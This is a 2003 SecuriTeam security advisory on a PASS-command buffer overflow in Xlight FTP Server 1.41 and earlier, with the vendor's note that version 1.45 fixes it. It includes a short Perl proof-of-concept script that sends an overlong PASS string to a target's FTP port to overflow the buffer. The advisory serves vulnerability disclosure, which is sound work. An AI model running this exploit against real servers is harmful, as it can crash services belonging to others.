[NT] Xlight FTP Server PASS Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

    To: list@securiteam.com
    Date: 22 Dec 2003 14:04:50 +0200

    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Xlight FTP Server PASS Buffer Overflow

    SUMMARY

     <http://www.xlightftpd.com/> Xlight FTP server is "a powerful ftp server
    with very small program size". A buffer overflow vulnerability in the
    product has been found allowing remote attackers to overflow an internal
    buffer.

    DETAILS

    Vulnerable systems:
     * Xlight FTP Server version 1.41 and prior

    Immune systems:
     * Xlight FTP Server version 1.45

    By sending an overflow long PASS command a local buffer used in Xlight FTP
    server can be overflowed.

    Vendor status:
    "We would like to inform you that we have release a new version of Xlight
    ftp server 1.45 which includes solution for this buffer overflow problem.
    Thanks for your alert.

    Best regards,
    Xlight ftp support
    support@xlightftpd.com"

    Exploit:
    #!/usr/bin/perl
    #
    # Exploit for Xlight FTP server long PASS vulnerability
    #
    use IO::Socket;
    unless (@ARGV == 1) { die "usage: $0 host ..." }
    $host = shift(@ARGV);
    $remote = IO::Socket::INET->new( Proto => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => "ftp(21)",
                                     );
    unless ($remote) { die "cannot connect to ftp daemon on $host" }

    $remote->autoflush(1);

    print $remote "USER anonymous\r\n";
    sleep(1);

    $buf = "A"x54; # Min 54, Max 523
    print $remote "PASS ".$buf."\r\n";
    sleep(1);

    close $remote;

    ADDITIONAL INFORMATION

    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.